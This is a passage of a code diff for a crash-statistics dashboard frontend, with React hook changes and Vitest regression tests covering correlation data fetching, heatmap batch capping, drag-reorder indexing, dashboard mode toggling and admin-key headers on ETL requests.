+  const value = useAskAiState();
+  return <AskAiContext.Provider value={value}>{children}</AskAiContext.Provider>;
+}
+
+/**
+ * Access the shared Ask AI conversation. Public API is unchanged from the
+ * former standalone hook (messages, isLoading, error, cooldownEnd, sendMessage,
+ * retry, clearConversation) — but every consumer now reads/writes the SAME
+ * state, so the AI companion and the Ask AI page can no longer clobber each
+ * other's history.
+ */
+export function useAskAi(): AskAiApi {
+  const ctx = useContext(AskAiContext);
+  if (!ctx) {
+    throw new Error("useAskAi must be used within an <AskAiProvider>");
+  }
+  return ctx;
 }

--- a/frontend/src/hooks/useChoroplethData.ts
+++ b/frontend/src/hooks/useChoroplethData.ts
@@ -307,7 +307,7 @@ export function useChoroplethData(measure: MeasureKey, rawFilters: ChoroplethFil
     byCountyCode,
     nameToCode,
     isLoading: statsQ.isLoading || demoQ.isLoading || yearStatsQ.isLoading || cesQ.isLoading || unempQ.isLoading,
-    isError: statsQ.isError || demoQ.isError || cesQ.isError || unempQ.isError,
+    isError: statsQ.isError || demoQ.isError || yearStatsQ.isError || cesQ.isError || unempQ.isError,
     is422: rawError?.status === 422,
     error: rawError,
     demographicsAvailable: !demoQ.isError && (demos?.length ?? 0) > 0,

--- a/frontend/src/hooks/useCorrelationData.timelapse.test.tsx
+++ b/frontend/src/hooks/useCorrelationData.timelapse.test.tsx
@@ -1,0 +1,88 @@
+import { describe, it, expect, beforeEach, vi } from "vitest";
+import { renderHook, waitFor } from "@testing-library/react";
+import { QueryClient, QueryClientProvider } from "@tanstack/react-query";
+import type { ReactNode } from "react";
+import { useCorrelationData, type CorrelationFilters } from "./useCorrelationData";
+
+/**
+ * H-F7 regression: during timelapse playback the animated year is embedded in
+ * the correlation filters. Only the crash-level stats/batch call is year
+ * dependent; the ~7 supplemental county-reference endpoints are not. Advancing
+ * the year must NOT re-key / refetch those supplemental endpoints.
+ */
+
+function wrapper() {
+  const client = new QueryClient({ defaultOptions: { queries: { retry: false } } });
+  return ({ children }: { children: ReactNode }) => (
+    <QueryClientProvider client={client}>{children}</QueryClientProvider>
+  );
+}
+
+const SUPPLEMENTAL_ENDPOINTS = [
+  "/api/demographics",
+  "/api/calenviroscreen",
+  "/api/unemployment",
+  "/api/vehicles",
+  "/api/weather",
+  "/api/fars",
+  "/api/tract-density",
+];
+
+function countCalls(spy: ReturnType<typeof vi.spyOn>, substr: string): number {
+  return spy.mock.calls.filter((c: unknown[]) => String(c[0]).includes(substr)).length;
+}
+
+function yearFilters(year: number): CorrelationFilters {
+  return { dateRange: { start: { year, month: 1 }, end: { year, month: 12 } } };
+}
+
+describe("useCorrelationData timelapse decoupling", () => {
+  beforeEach(() => {
+    vi.restoreAllMocks();
+  });
+
+  it("refetches stats/batch per year but fetches supplemental endpoints only once", async () => {
+    const spy = vi.spyOn(globalThis, "fetch").mockImplementation((input) => {
+      const url = String(input);
+      if (url.includes("/api/stats/batch")) {
+        return Promise.resolve(
+          new Response(
+            JSON.stringify({
+              county: [
+                { county_code: 19, county_name: "Los Angeles", crash_count: 100, total_killed: 5, total_injured: 40 },
+                { county_code: 37, county_name: "Orange", crash_count: 60, total_killed: 2, total_injured: 20 },
+              ],
+            }),
+          ),
+        );
+      }
+      return Promise.resolve(new Response("[]"));
+    });
+
+    const { result, rerender } = renderHook(
+      ({ filters }: { filters: CorrelationFilters }) => useCorrelationData(filters),
+      { wrapper: wrapper(), initialProps: { filters: yearFilters(2018) } },
+    );
+
+    await waitFor(() => expect(result.current.isLoading).toBe(false));
+
+    expect(countCalls(spy, "/api/stats/batch")).toBe(1);
+    for (const ep of SUPPLEMENTAL_ENDPOINTS) {
+      expect(countCalls(spy, ep)).toBe(1);
+    }
+
+    // Simulate the timelapse ticker advancing the animated year.
+    for (const y of [2019, 2020, 2021]) {
+      rerender({ filters: yearFilters(y) });
+      await waitFor(() => expect(result.current.isLoading).toBe(false));
+    }
+
+    // Year-dependent stats/batch is refetched once per distinct year (4 total)…
+    await waitFor(() => expect(countCalls(spy, "/api/stats/batch")).toBe(4));
+
+    // …but every filter-independent supplemental endpoint was fetched exactly once.
+    for (const ep of SUPPLEMENTAL_ENDPOINTS) {
+      expect(countCalls(spy, ep)).toBe(1);
+    }
+  });
+});

--- a/frontend/src/hooks/useCorrelationData.ts
+++ b/frontend/src/hooks/useCorrelationData.ts
@@ -1,3 +1,4 @@
+import { useMemo } from "react";
 import { useQuery } from "@tanstack/react-query";
 import { API_BASE } from "../config";
 import { formatYearMonth, type DateRangeFilter } from "./useFilterParams";
@@ -141,52 +142,60 @@ async function safeFetchJson<T = Record<string, unknown>[]>(
   }
 }
 
-export function useCorrelationData(filters?: CorrelationFilters) {
-  // Build the batch body for crash stats — applies crash-level filters but never county
-  const batchBody: Record<string, string> = {};
-  if (filters?.dateRange?.start) batchBody.start = formatYearMonth(filters.dateRange.start);
-  if (filters?.dateRange?.end) batchBody.end = formatYearMonth(filters.dateRange.end);
-  if (filters?.severity?.length) batchBody.severity = filters.severity.map((s) => s.toLowerCase().replace(/ /g, "-")).join(",");
-  if (filters?.alcohol) batchBody.alcohol = "true";
-  if (filters?.pedestrian) batchBody.pedestrian = "true";
-  if (filters?.cyclist) batchBody.cyclist = "true";
-  if (filters?.drug) batchBody.drug = "true";
-  if (filters?.distracted) batchBody.distracted = "true";
+/**
+ * Supplemental (county-reference) datasets used by the correlation matrix.
+ * NONE of these depend on the crash-level filters (date range, severity,
+ * involvement flags) — they are static per-county reference tables. They are
+ * therefore fetched under a filter-independent query key so that changing the
+ * animated timelapse year (or any crash filter) does NOT refetch them.
+ */
+export type CorrelationSupplemental = {
+  demographics: Record<string, unknown>[];
+  calenviro: Record<string, unknown>[];
+  unemployment: Record<string, unknown>[];
+  vehicles: Record<string, unknown>[];
+  weather: Record<string, unknown>[];
+  fars: Record<string, unknown>[];
+  density: Record<string, unknown>[];
+};
 
-  // Stable cache key incorporating active filters
-  const filterKey = JSON.stringify(batchBody);
+/** Fetch all filter-independent supplemental sources in parallel. */
+async function fetchCorrelationSupplemental(): Promise<CorrelationSupplemental> {
+  const [demographics, calenviro, unemployment, vehicles, weather, fars, density] = await Promise.all([
+    safeFetchJson<Record<string, unknown>[]>(`${API_BASE}/api/demographics`),
+    safeFetchJson<Record<string, unknown>[]>(`${API_BASE}/api/calenviroscreen`),
+    safeFetchJson<Record<string, unknown>[]>(`${API_BASE}/api/unemployment`),
+    safeFetchJson<Record<string, unknown>[]>(`${API_BASE}/api/vehicles`),
+    safeFetchJson<Record<string, unknown>[]>(`${API_BASE}/api/weather`),
+    safeFetchJson<Record<string, unknown>[]>(`${API_BASE}/api/fars`),
+    safeFetchJson<Record<string, unknown>[]>(`${API_BASE}/api/tract-density`),
+  ]);
+  return { demographics, calenviro, unemployment, vehicles, weather, fars, density };
+}
 
-  return useQuery({
-    queryKey: ["correlation-matrix", filterKey],
-    queryFn: async () => {
-      // Stats is required — it provides the base county rows
-      // Only crash-level filters applied; county is omitted so we get all 58
-      const statsRes = await fetch(`${API_BASE}/api/stats/batch`, {
-        method: "POST",
-        headers: { "Content-Type": "application/json" },
-        body: JSON.stringify({ groups: ["county"], ...batchBody }),
-      });
-      if (!statsRes.ok) {
-        throw new Error("Failed to fetch crash stats for correlation matrix");
-      }
-      const stats = await statsRes.json();
+export type CorrelationResult = {
+  fields: CorrelationField[];
+  matrix: number[][];
+  countyCount: number;
+  counties: CountyRow[];
+};
 
-      // Supplemental sources — fetch in parallel, gracefully skip failures
-      const [demographics, calenviro, unemployment, vehicles, weather, fars, density] = await Promise.all([
-        safeFetchJson<Record<string, unknown>[]>(`${API_BASE}/api/demographics`),
-        safeFetchJson<Record<string, unknown>[]>(`${API_BASE}/api/calenviroscreen`),
-        safeFetchJson<Record<string, unknown>[]>(`${API_BASE}/api/unemployment`),
-        safeFetchJson<Record<string, unknown>[]>(`${API_BASE}/api/vehicles`),
-        safeFetchJson<Record<string, unknown>[]>(`${API_BASE}/api/weather`),
-        safeFetchJson<Record<string, unknown>[]>(`${API_BASE}/api/fars`),
-        safeFetchJson<Record<string, unknown>[]>(`${API_BASE}/api/tract-density`),
-      ]);
+/**
+ * Pure builder: merge the (year-dependent) county crash stats with the
+ * (filter-independent) supplemental datasets and compute the Pearson matrix.
+ * Kept as a standalone function so the expensive 29×29 recompute only runs
+ * when one of its inputs actually changes (see useMemo in useCorrelationData),
+ * not on every unrelated re-render.
+ */
+export function buildCorrelationResult(
+  countyStats: Record<string, unknown>[],
+  supplemental: CorrelationSupplemental,
+): CorrelationResult {
+  const { demographics, calenviro, unemployment, vehicles, weather, fars, density } = supplemental;
 
-      const countyStats: Record<string, unknown>[] = stats.county ?? [];
+  const byCounty: Record<string, CountyRow> = {};
 
-      const byCounty: Record<string, CountyRow> = {};
-
-      for (const r of countyStats) {
+  for (const r of countyStats) {
         const code = String((r as Record<string, unknown>).county_code ?? "");
         if (!code) continue;
         byCounty[code] = {
@@ -332,8 +341,61 @@ export function useCorrelationData(filters?: CorrelationFilters) {
         }
       }
 
-      return { fields, matrix, countyCount: counties.length, counties };
+  return { fields, matrix, countyCount: counties.length, counties };
+}
+
+export function useCorrelationData(filters?: CorrelationFilters) {
+  // Build the batch body for crash stats — applies crash-level filters but never county
+  const batchBody: Record<string, string> = {};
+  if (filters?.dateRange?.start) batchBody.start = formatYearMonth(filters.dateRange.start);
+  if (filters?.dateRange?.end) batchBody.end = formatYearMonth(filters.dateRange.end);
+  if (filters?.severity?.length) batchBody.severity = filters.severity.map((s) => s.toLowerCase().replace(/ /g, "-")).join(",");
+  if (filters?.alcohol) batchBody.alcohol = "true";
+  if (filters?.pedestrian) batchBody.pedestrian = "true";
+  if (filters?.cyclist) batchBody.cyclist = "true";
+  if (filters?.drug) batchBody.drug = "true";
+  if (filters?.distracted) batchBody.distracted = "true";
+
+  // Stable cache key incorporating active filters (crash stats only)
+  const filterKey = JSON.stringify(batchBody);
+
+  // Filter-independent supplemental sources — fetched ONCE under a stable key.
+  // The animated timelapse year changes filterKey (below) but never this key,
+  // so these ~7 endpoints are not refetched on every tick.
+  const supplemental = useQuery({
+    queryKey: ["correlation-supplemental"],
+    queryFn: fetchCorrelationSupplemental,
+    staleTime: 30 * 60 * 1000,
+  });
+
+  // Year/filter-dependent county crash stats — re-keyed per filter change.
+  const statsQuery = useQuery({
+    queryKey: ["correlation-stats", filterKey],
+    queryFn: async () => {
+      // Only crash-level filters applied; county is omitted so we get all 58
+      const statsRes = await fetch(`${API_BASE}/api/stats/batch`, {
+        method: "POST",
+        headers: { "Content-Type": "application/json" },
+        body: JSON.stringify({ groups: ["county"], ...batchBody }),
+      });
+      if (!statsRes.ok) {
+        throw new Error("Failed to fetch crash stats for correlation matrix");
+      }
+      const stats = await statsRes.json();
+      return (stats.county ?? []) as Record<string, unknown>[];
     },
     staleTime: 5 * 60 * 1000,
   });
+
+  // Combine + compute the Pearson matrix only when an input actually changes.
+  const data = useMemo<CorrelationResult | undefined>(() => {
+    if (!statsQuery.data || !supplemental.data) return undefined;
+    return buildCorrelationResult(statsQuery.data, supplemental.data);
+  }, [statsQuery.data, supplemental.data]);
+
+  return {
+    data,
+    isLoading: statsQuery.isLoading || supplemental.isLoading,
+    error: statsQuery.error ?? supplemental.error ?? null,
+  };
 }

--- a/frontend/src/hooks/useCrashHeatmap.test.ts
+++ b/frontend/src/hooks/useCrashHeatmap.test.ts
@@ -2,7 +2,7 @@ import { describe, it, expect, vi, afterEach } from "vitest";
 import { renderHook, waitFor, act } from "@testing-library/react";
 import { QueryClient, QueryClientProvider } from "@tanstack/react-query";
 import { createElement, type ReactNode } from "react";
-import { useCrashHeatmap, useBatchedHeatmap, FETCH_TIMEOUT_MS } from "./useCrashHeatmap";
+import { useCrashHeatmap, useBatchedHeatmap, FETCH_TIMEOUT_MS, MAX_HEATMAP_POINTS } from "./useCrashHeatmap";
 
 const MOCK_RESPONSE = {
   points: [
@@ -295,5 +295,49 @@ describe("useBatchedHeatmap", () => {
 
     await waitFor(() => expect(result.current.points.length).toBe(2));
     expect(result.current.error).toBeFalsy();
+  });
+
+  it("caps accumulation and stops fetching further batches once the ceiling is hit", async () => {
+    // Batch 1 alone exceeds the cap. A dense county would otherwise keep
+    // pulling millions of points into one array; we must clamp and stop.
+    const overCap = MAX_HEATMAP_POINTS + 50;
+    const bigPoints = Array.from({ length: overCap }, (_, i) => ({
+      lat: 34 + (i % 1000) / 1e6,
+      lng: -118 - (i % 1000) / 1e6,
+      weight: 1,
+    }));
+    const BIG_BATCH_1 = { points: bigPoints, total_crashes: overCap, batch: 1, total_batches: 5 };
+
+    const spy = vi.spyOn(globalThis, "fetch").mockImplementation(async (input) => {
+      const batch = new URL(String(input), "http://localhost").searchParams.get("batch");
+      if (batch === "1") return new Response(JSON.stringify(BIG_BATCH_1));
+      // Any batch > 1 would blow past the cap — it must never be requested.
+      return new Response(JSON.stringify({ points: [], total_crashes: overCap, batch: Number(batch), total_batches: 5 }));
+    });
+
+    const { result } = renderHook(
+      () =>
+        useBatchedHeatmap({
+          enabled: true,
+          county: "los-angeles",
+          dateRange: null,
+          severities: [],
+          causes: [],
+          resolution: "raw",
+        }),
+      { wrapper: makeWrapper() },
+    );
+
+    // Folding ~600k points is heavy under full-suite parallelism — give the
+    // accumulation room beyond waitFor's 1s default.
+    await waitFor(() => expect(result.current.capped).toBe(true), { timeout: 10_000 });
+    // Clamped exactly to the ceiling, not the over-cap length.
+    expect(result.current.points.length).toBe(MAX_HEATMAP_POINTS);
+    expect(result.current.hasMore).toBe(false);
+    // Only batch 1 was ever fetched — advancement halted at the cap.
+    const batchesFetched = spy.mock.calls.map((c) =>
+      new URL(String(c[0]), "http://localhost").searchParams.get("batch"),
+    );
+    expect(batchesFetched).toEqual(["1"]);
   });
 });

--- a/frontend/src/hooks/useCrashHeatmap.test.ts
+++ b/frontend/src/hooks/useCrashHeatmap.test.ts
@@ -127,6 +127,37 @@ describe("useCrashHeatmap", () => {
   it("exports FETCH_TIMEOUT_MS as 15000", () => {
     expect(FETCH_TIMEOUT_MS).toBe(15_000);
   });
+
+  it("exposes refetch that re-runs a failed request", async () => {
+    let callCount = 0;
+    vi.spyOn(globalThis, "fetch").mockImplementation(async () => {
+      callCount++;
+      if (callCount === 1) return new Response("server error", { status: 500 });
+      return new Response(JSON.stringify(MOCK_RESPONSE));
+    });
+
+    const { result } = renderHook(
+      () =>
+        useCrashHeatmap({
+          enabled: true,
+          county: null,
+          dateRange: null,
+          severities: [],
+          causes: [],
+          resolution: "low",
+        }),
+      { wrapper: makeWrapper() },
+    );
+
+    await waitFor(() => expect(result.current.error).toBeTruthy());
+
+    await act(async () => {
+      await result.current.refetch();
+    });
+
+    await waitFor(() => expect(result.current.error).toBeFalsy());
+    expect(result.current.points).toEqual(MOCK_RESPONSE.points);
+  });
 });
 
 describe("useBatchedHeatmap", () => {
@@ -191,7 +222,45 @@ describe("useBatchedHeatmap", () => {
 
     await waitFor(() => expect(result.current.points.length).toBe(1));
     expect(result.current.points).toEqual(BATCH_1.points);
-    expect(result.current.error).toBeTruthy();
+    await waitFor(() => expect(result.current.error).toBeTruthy());
+    // Advancement must halt on the failed batch, not skip past it.
+    expect(result.current.currentBatch).toBe(2);
+  });
+
+  it("advances past a legitimately empty mid-sequence batch", async () => {
+    const EMPTY_BATCH_2 = { points: [], total_crashes: 3, batch: 2, total_batches: 3 };
+    const BATCH_3 = {
+      points: [{ lat: 34.2, lng: -118.2, weight: 1 }],
+      total_crashes: 3,
+      batch: 3,
+      total_batches: 3,
+    };
+    vi.spyOn(globalThis, "fetch").mockImplementation(async (input) => {
+      const batch = new URL(String(input), "http://localhost").searchParams.get("batch");
+      if (batch === "1") return new Response(JSON.stringify(BATCH_1));
+      if (batch === "2") return new Response(JSON.stringify(EMPTY_BATCH_2));
+      return new Response(JSON.stringify(BATCH_3));
+    });
+
+    const { result } = renderHook(
+      () =>
+        useBatchedHeatmap({
+          enabled: true,
+          county: "los-angeles",
+          dateRange: null,
+          severities: [],
+          causes: [],
+          resolution: "raw",
+        }),
+      { wrapper: makeWrapper() },
+    );
+
+    // The empty page 2 must not stall the sequence — batch 3 still loads.
+    await waitFor(() => expect(result.current.currentBatch).toBe(3));
+    await waitFor(() => expect(result.current.points.length).toBe(2));
+    expect(result.current.points).toEqual([...BATCH_1.points, ...BATCH_3.points]);
+    await waitFor(() => expect(result.current.hasMore).toBe(false));
+    expect(result.current.error).toBeFalsy();
   });
 
   it("exposes retry function that re-fetches failed batch", async () => {

--- a/frontend/src/hooks/useCrashHeatmap.ts
+++ b/frontend/src/hooks/useCrashHeatmap.ts
@@ -95,7 +95,7 @@ async function fetchHeatmap(params: HeatmapParams): Promise<HeatmapApiResponse> 
 }
 
 export function useCrashHeatmap(params: HeatmapParams) {
-  const { data, isLoading, error } = useQuery({
+  const { data, isLoading, error, refetch } = useQuery({
     queryKey: [
       "crashHeatmap",
       params.county,
@@ -132,6 +132,7 @@ export function useCrashHeatmap(params: HeatmapParams) {
     totalBatches: data?.total_batches ?? null,
     isLoading,
     error,
+    refetch,
   };
 }
 
@@ -160,11 +161,15 @@ export function useBatchedHeatmap(params: Omit<HeatmapParams, "batch" | "batchSi
     }
   }, [points, batch, currentBatch, filterKey]);
 
+  // Auto-advance after any *successful* response while batches remain — a
+  // legitimately empty page must not stall the sequence. Only stop on error
+  // or completion. `batch === currentBatch` ensures the response we advance
+  // from actually belongs to the batch we asked for.
   useEffect(() => {
-    if (!isLoading && totalBatches && currentBatch < totalBatches && points.length > 0) {
+    if (!isLoading && !error && totalBatches && batch === currentBatch && currentBatch < totalBatches) {
       setCurrentBatch((b) => b + 1);
     }
-  }, [isLoading, totalBatches, currentBatch, points.length]);
+  }, [isLoading, error, totalBatches, batch, currentBatch]);
 
   const loadNextBatch = useCallback(() => {
     if (totalBatches && currentBatch < totalBatches) {

--- a/frontend/src/hooks/useCrashHeatmap.ts
+++ b/frontend/src/hooks/useCrashHeatmap.ts
@@ -136,11 +136,27 @@ export function useCrashHeatmap(params: HeatmapParams) {
   };
 }
 
+// Hard ceiling on accumulated heatmap points for a single county view. A
+// dense county (e.g. Los Angeles) can return several million rows; holding
+// them all means multi-GB arrays, O(total) rebuilds per batch, and a full
+// rescan of the array on every pan. This many points already saturate the
+// heatmap's visual density and the dot layer is viewport-culled to ≤800, so
+// past this bound extra points cost memory and main-thread time for no
+// visible gain. When we hit it we stop fetching further batches and surface
+// `capped` so the UI can say it's showing a sample rather than looking stuck.
+export const MAX_HEATMAP_POINTS = 600_000;
+
 export function useBatchedHeatmap(params: Omit<HeatmapParams, "batch" | "batchSize"> & { batchSize?: number }) {
   const size = params.batchSize ?? 150_000;
   const [currentBatch, setCurrentBatch] = useState(1);
   const [allPoints, setAllPoints] = useState<HeatmapPoint[]>([]);
+  // Highest batch number already folded into allPoints. Advancement waits on
+  // this so we never request batch N+1 before batch N is accounted for —
+  // otherwise the cap check (below) races the accumulation and lets one extra
+  // batch through.
+  const [loadedUpTo, setLoadedUpTo] = useState(0);
   const [retryKey, setRetryKey] = useState(0);
+  const capped = allPoints.length >= MAX_HEATMAP_POINTS;
 
   const { points, totalCrashes, batch, totalBatches, isLoading, error } = useCrashHeatmap({
     ...params,
@@ -153,23 +169,38 @@ export function useBatchedHeatmap(params: Omit<HeatmapParams, "batch" | "batchSi
   useEffect(() => {
     setCurrentBatch(1);
     setAllPoints([]);
+    setLoadedUpTo(0);
   }, [filterKey]);
 
+  // Fold each completed batch into the accumulator and mark it loaded. Runs
+  // for empty batches too (points can be legitimately empty) so advancement
+  // isn't stalled. `batch === currentBatch` ensures the response belongs to
+  // the batch we asked for.
   useEffect(() => {
-    if (points.length > 0 && batch === currentBatch) {
-      setAllPoints((prev) => currentBatch === 1 ? points : [...prev, ...points]);
+    if (!isLoading && !error && batch === currentBatch && loadedUpTo < currentBatch) {
+      if (points.length > 0) {
+        setAllPoints((prev) => {
+          if (currentBatch === 1) return points.slice(0, MAX_HEATMAP_POINTS);
+          if (prev.length >= MAX_HEATMAP_POINTS) return prev;
+          const remaining = MAX_HEATMAP_POINTS - prev.length;
+          // concat (not [...prev, ...points]) avoids spreading a multi-million
+          // element array into a fresh literal on every batch.
+          return prev.concat(remaining >= points.length ? points : points.slice(0, remaining));
+        });
+      }
+      setLoadedUpTo(currentBatch);
     }
-  }, [points, batch, currentBatch, filterKey]);
+  }, [points, batch, currentBatch, loadedUpTo, isLoading, error]);
 
-  // Auto-advance after any *successful* response while batches remain — a
-  // legitimately empty page must not stall the sequence. Only stop on error
-  // or completion. `batch === currentBatch` ensures the response we advance
-  // from actually belongs to the batch we asked for.
+  // Auto-advance once the current batch is folded in and batches remain. Stop
+  // on error, completion, or once we've hit the accumulation cap (fetching
+  // further batches would just discard them). Gating on loadedUpTo (not the
+  // raw response) keeps the cap check from racing the accumulation.
   useEffect(() => {
-    if (!isLoading && !error && totalBatches && batch === currentBatch && currentBatch < totalBatches) {
+    if (!capped && loadedUpTo === currentBatch && totalBatches && currentBatch < totalBatches) {
       setCurrentBatch((b) => b + 1);
     }
-  }, [isLoading, error, totalBatches, batch, currentBatch]);
+  }, [capped, loadedUpTo, totalBatches, currentBatch]);
 
   const loadNextBatch = useCallback(() => {
     if (totalBatches && currentBatch < totalBatches) {
@@ -186,7 +217,9 @@ export function useBatchedHeatmap(params: Omit<HeatmapParams, "batch" | "batchSi
     totalCrashes,
     currentBatch,
     totalBatches,
-    hasMore: totalBatches != null && currentBatch < totalBatches,
+    // Once capped we stop advancing, so there's no "more" to load.
+    hasMore: !capped && totalBatches != null && currentBatch < totalBatches,
+    capped,
     loadNextBatch,
     retry,
     isLoading,

--- a/frontend/src/hooks/useDashboardConfig.ts
+++ b/frontend/src/hooks/useDashboardConfig.ts
@@ -65,7 +65,10 @@ export function useDashboardConfig() {
   const setMode = useCallback((mode: "simple" | "advanced") => {
     setConfig((prev) => {
       if (prev.mode === mode) return prev;
-      if (mode === "advanced") return { ...prev, mode, charts: [] };
+      // Entering builder mode keeps any previously built charts — they are
+      // merely dormant while a preset is active. Clearing them here would make
+      // the "B" shortcut and command-palette toggle silently destructive.
+      // Users who want a blank canvas have the explicit "clear charts" action.
       return { ...prev, mode };
     });
   }, []);

--- a/frontend/src/hooks/useDragReorder.test.ts
+++ b/frontend/src/hooks/useDragReorder.test.ts
@@ -1,0 +1,111 @@
+import { describe, it, expect, beforeEach } from "vitest";
+import { renderHook, act } from "@testing-library/react";
+import { insertionIndexToItemIndex } from "./useDragReorder";
+import { useDashboardConfig } from "./useDashboardConfig";
+import type { Dimension } from "../lib/dashboard/types";
+
+/**
+ * Regression tests for the drag-reorder off-by-one: getDropIndex produces an
+ * insertion index (0..N, where N means "after the last item"), while
+ * reorderChart expects the final item index. insertionIndexToItemIndex is the
+ * conversion applied in useDragReorder's drop handler; these tests drive the
+ * real reorderChart with the converted index, exactly like a completed drag.
+ */
+
+const DIMS: Dimension[] = ["year", "county", "severity", "hour"];
+
+function setupCharts() {
+  const rendered = renderHook(() => useDashboardConfig());
+  act(() => {
+    rendered.result.current.setMode("advanced");
+  });
+  act(() => {
+    for (const dimension of DIMS) {
+      rendered.result.current.addChart({ dimension, measure: "count", chartType: "bar" });
+    }
+  });
+  return rendered;
+}
+
+function dimensionOrder(result: { current: ReturnType<typeof useDashboardConfig> }): string[] {
+  return [...result.current.config.charts]
+    .sort((a, b) => a.order - b.order)
+    .map((c) => c.dimension);
+}
+
+/** Simulate a completed drag from `fromIndex` to insertion index `insertionIndex`. */
+function drop(
+  result: { current: ReturnType<typeof useDashboardConfig> },
+  fromIndex: number,
+  insertionIndex: number,
+) {
+  const toIndex = insertionIndexToItemIndex(fromIndex, insertionIndex);
+  if (toIndex !== fromIndex) {
+    act(() => result.current.reorderChart(fromIndex, toIndex));
+  }
+}
+
+describe("insertionIndexToItemIndex", () => {
+  it("keeps upward moves unchanged", () => {
+    expect(insertionIndexToItemIndex(3, 1)).toBe(1);
+    expect(insertionIndexToItemIndex(2, 0)).toBe(0);
+  });
+
+  it("shifts downward moves left by one (removal shifts later items)", () => {
+    expect(insertionIndexToItemIndex(0, 2)).toBe(1);
+    expect(insertionIndexToItemIndex(1, 3)).toBe(2);
+  });
+
+  it("maps an end-of-list drop to the last item index", () => {
+    expect(insertionIndexToItemIndex(0, 4)).toBe(3);
+  });
+
+  it("treats dropping on itself (before or after) as a no-op", () => {
+    expect(insertionIndexToItemIndex(2, 2)).toBe(2);
+    expect(insertionIndexToItemIndex(2, 3)).toBe(2);
+  });
+});
+
+describe("drag reorder applied to the dashboard config", () => {
+  beforeEach(() => {
+    localStorage.clear();
+    window.history.replaceState(null, "", "/stats");
+  });
+
+  it("drops at the end of the list", () => {
+    const { result } = setupCharts();
+    // Dragging the first card past the last card: insertion index = length.
+    drop(result, 0, 4);
+    expect(dimensionOrder(result)).toEqual(["county", "severity", "hour", "year"]);
+  });
+
+  it("downward drop lands where the insertion indicator showed", () => {
+    const { result } = setupCharts();
+    // Indicator before item 2 ("severity"): the dragged card must end up
+    // immediately before "severity", not one slot past it.
+    drop(result, 0, 2);
+    expect(dimensionOrder(result)).toEqual(["county", "year", "severity", "hour"]);
+  });
+
+  it("upward drop lands at the insertion index", () => {
+    const { result } = setupCharts();
+    drop(result, 3, 1);
+    expect(dimensionOrder(result)).toEqual(["year", "hour", "county", "severity"]);
+  });
+
+  it("dropping a card on itself is a no-op", () => {
+    const { result } = setupCharts();
+    const before = result.current.config.charts;
+    drop(result, 1, 1); // insertion right before itself
+    drop(result, 1, 2); // insertion right after itself
+    expect(result.current.config.charts).toBe(before);
+    expect(dimensionOrder(result)).toEqual(["year", "county", "severity", "hour"]);
+  });
+
+  it("keeps built charts when toggling out of and back into builder mode", () => {
+    const { result } = setupCharts();
+    act(() => result.current.setMode("simple"));
+    act(() => result.current.setMode("advanced"));
+    expect(dimensionOrder(result)).toEqual(["year", "county", "severity", "hour"]);
+  });
+});

--- a/frontend/src/hooks/useDragReorder.ts
+++ b/frontend/src/hooks/useDragReorder.ts
@@ -73,6 +73,20 @@ export interface DragHandleProps {
 const SCROLL_EDGE_PX = 60;
 const SCROLL_SPEED = 12;
 
+/**
+ * Convert an insertion index (0..items.length, as produced by getDropIndex —
+ * "insert before item i", with items.length meaning "after the last item")
+ * into the final item index the dragged card occupies after the move.
+ *
+ * When moving down, removing the dragged card first shifts every later item
+ * left by one, so the insertion index overshoots the final position by one.
+ * A result equal to fromIndex means the drop is a no-op (dropping a card on
+ * itself or immediately after itself).
+ */
+export function insertionIndexToItemIndex(fromIndex: number, insertionIndex: number): number {
+  return insertionIndex > fromIndex ? insertionIndex - 1 : insertionIndex;
+}
+
 export function useDragReorder({
   items,
   onReorder,
@@ -205,9 +219,13 @@ export function useDragReorder({
     handleActivatedRef.current = false;
 
     const { dragId, overIndex } = dragState;
-    if (dragId && overIndex !== null && overIndex !== dragSourceIndex.current) {
-      onReorder(dragSourceIndex.current, overIndex);
-      setAnnouncement(`Dropped chart at position ${overIndex + 1} of ${items.length}.`);
+    const fromIndex = dragSourceIndex.current;
+    // overIndex is an insertion index; onReorder (like the keyboard path)
+    // expects the final item index, so convert before dispatching.
+    const toIndex = overIndex !== null ? insertionIndexToItemIndex(fromIndex, overIndex) : null;
+    if (dragId && toIndex !== null && toIndex !== fromIndex) {
+      onReorder(fromIndex, toIndex);
+      setAnnouncement(`Dropped chart at position ${toIndex + 1} of ${items.length}.`);
     } else {
       setAnnouncement("Reorder cancelled.");
     }

--- a/frontend/src/hooks/useDragReorder.ts
+++ b/frontend/src/hooks/useDragReorder.ts
@@ -102,6 +102,11 @@ export function useDragReorder({
   const containerRef = useRef<HTMLElement | null>(null);
   const scrollRafRef = useRef<number | null>(null);
   const dragSourceIndex = useRef<number>(-1);
+  // Mirror the latest dragState so handleDragEnd can read dragId/overIndex
+  // without depending on dragState — that dependency previously rebuilt
+  // getItemProps on every dragover, handing every card fresh props.
+  const dragStateRef = useRef(dragState);
+  dragStateRef.current = dragState;
   // Track which handle was activated so we can cancel drags started elsewhere
   const handleActivatedRef = useRef(false);
 
@@ -218,7 +223,7 @@ export function useDragReorder({
     stopAutoScroll();
     handleActivatedRef.current = false;
 
-    const { dragId, overIndex } = dragState;
+    const { dragId, overIndex } = dragStateRef.current;
     const fromIndex = dragSourceIndex.current;
     // overIndex is an insertion index; onReorder (like the keyboard path)
     // expects the final item index, so convert before dispatching.
@@ -232,7 +237,7 @@ export function useDragReorder({
 
     setDragState({ dragId: null, overIndex: null, isDragging: false });
     dragSourceIndex.current = -1;
-  }, [dragState, onReorder, items.length, stopAutoScroll]);
+  }, [onReorder, items.length, stopAutoScroll]);
 
   const handleDragOver = useCallback((e: React.DragEvent) => {
     e.preventDefault();

--- a/frontend/src/hooks/useEtlStatus.ts
+++ b/frontend/src/hooks/useEtlStatus.ts
@@ -1,5 +1,19 @@
 import { useQuery, useMutation, useQueryClient } from "@tanstack/react-query";
 import { API_BASE } from "../config";
+import { etlAuthHeaders, clearAdminKey } from "../lib/adminKey";
+
+/**
+ * Fetch an /api/etl/* endpoint with the X-ETL-API-Key header attached.
+ * A 403 means the stored key is no longer valid: clear it so <AdminGuard>
+ * resets to the locked state.
+ */
+async function etlFetch(url: string, init?: RequestInit): Promise<Response> {
+  const res = await fetch(url, { ...init, headers: { ...etlAuthHeaders(), ...init?.headers } });
+  if (res.status === 403) {
+    clearAdminKey();
+  }
+  return res;
+}
 
 interface LastRun {
   id: number;
@@ -35,7 +49,7 @@ export function useEtlStatus() {
   return useQuery<EtlSource[]>({
     queryKey: ["etlStatus"],
     queryFn: async () => {
-      const res = await fetch(`${API_BASE}/api/etl/status`);
+      const res = await etlFetch(`${API_BASE}/api/etl/status`);
